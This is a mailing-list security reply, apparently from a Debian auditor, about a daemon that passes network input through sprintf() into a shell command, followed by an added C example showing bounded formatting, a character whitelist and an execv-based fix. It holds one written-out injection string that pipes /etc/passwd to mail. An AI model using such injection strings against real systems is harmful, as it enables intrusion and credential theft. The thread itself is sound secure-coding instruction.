Re: SOLVED: Daemon Programming
On Thu, Jan 13, 2005 at 09:41:29PM -0600, Sergio Cuéllar Valdés wrote:
> Marc, thanks that was the problem !!!
> sprintf(message, "say -s 4 -a \"%s\"", buffer); < this was the big
> big big mistake
It certainly was.
> I added the whole path to the instructions:
> sprintf(message, "/usr/local/bin/say -s 4 -a \"%s\"", buffer);
> Thanks to all of you who helped me !! :-)
You daemonize. You open a socket. You read input from that
socket - carefully avoiding buffer overflows - then you run the
/usr/local/bin/say -s 4 -a "the text you read"
Firstly, you don't avoid a simple buffer overflow. Although
you have two buffers, 'buffer' for receiving the message from
the network and 'message' for running the command, they are both the
same size, so you don't account for the extra characters when you
sprintf(message, "say -s 4 -a \"%s\"", buffer);
At least change that to:
snprintf(message, sizeof(message), "say -s 4 -a \"%s\"", buffer);
Secondly, and this is the biggie, you don't quote or process the
characters which are read from the network.
Consider what would happen if a malicious user sent this:
"; cat /etc/passwd | mail email@example.com ; echo "
You would run this command:
/usr/local/bin/say -s 4 -a ""; cat /etc/passwd | mail ... ; echo ""
Effectively you're allowing any user who can connect to your server
to execute arbitrary commands. If this is started by init you're likely
running as root too.
Check that the characters you read from the network are only
[a-zA-Z ] and you're probably OK.
# The Debian Security Audit Project.
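The three points raised in the reply (bounded formatting, input whitelisting, and not handing untrusted text to a shell at all) as one added C example. This is not code from the thread or from the original daemon; the /usr/local/bin/say path and its -s 4 -a flags are taken from the messages above, everything else is constructed for illustration.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

#define MSGSZ 256  /* constructed buffer size for the example */

/* The whitelist the reply suggests: accept only [a-zA-Z ].
 * Explicit range checks rather than isalpha() so the result does not
 * depend on the process locale. Returns 1 if safe, 0 otherwise. */
int is_safe_text(const char *s)
{
    for (; *s; s++) {
        int c = (unsigned char)*s;
        if (!((c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') || c == ' '))
            return 0;
    }
    return 1;
}

/* Bounded replacement for the sprintf() in the thread. snprintf() never
 * writes past outsz, but it silently truncates, so the return value is
 * checked: 0 on success, -1 if the command would not have fit. */
int build_say_command(char *out, size_t outsz, const char *text)
{
    int n = snprintf(out, outsz, "/usr/local/bin/say -s 4 -a \"%s\"", text);
    if (n < 0 || (size_t)n >= outsz)
        return -1;
    return 0;
}

/* Preferred fix: skip the shell entirely. The text becomes one argv
 * element for say, so shell metacharacters in it are never interpreted.
 * Returns the child's exit status, or -1 on fork/wait failure. */
int run_say_noshell(const char *text)
{
    char *const argv[] = { "/usr/local/bin/say", "-s", "4", "-a",
                           (char *)text, NULL };
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execv(argv[0], argv);
        _exit(127);  /* exec failed in the child */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* Constructed inputs: a benign message and the injection string quoted
 * in the reply. Only the benign one passes the whitelist. */
int main(void)
{
    const char *good = "hello world";
    const char *bad  = "\"; cat /etc/passwd | mail email@example.com ; echo \"";
    char msg[MSGSZ];

    printf("good safe=%d bad safe=%d\n", is_safe_text(good), is_safe_text(bad));
    if (is_safe_text(good) && build_say_command(msg, sizeof msg, good) == 0)
        printf("would run: %s\n", msg);
    return 0;
}
```

Even with the whitelist in place, run_say_noshell() is the stronger design: it removes the shell from the path, so the correctness of the daemon no longer rests on a filter keeping up with every metacharacter a shell understands.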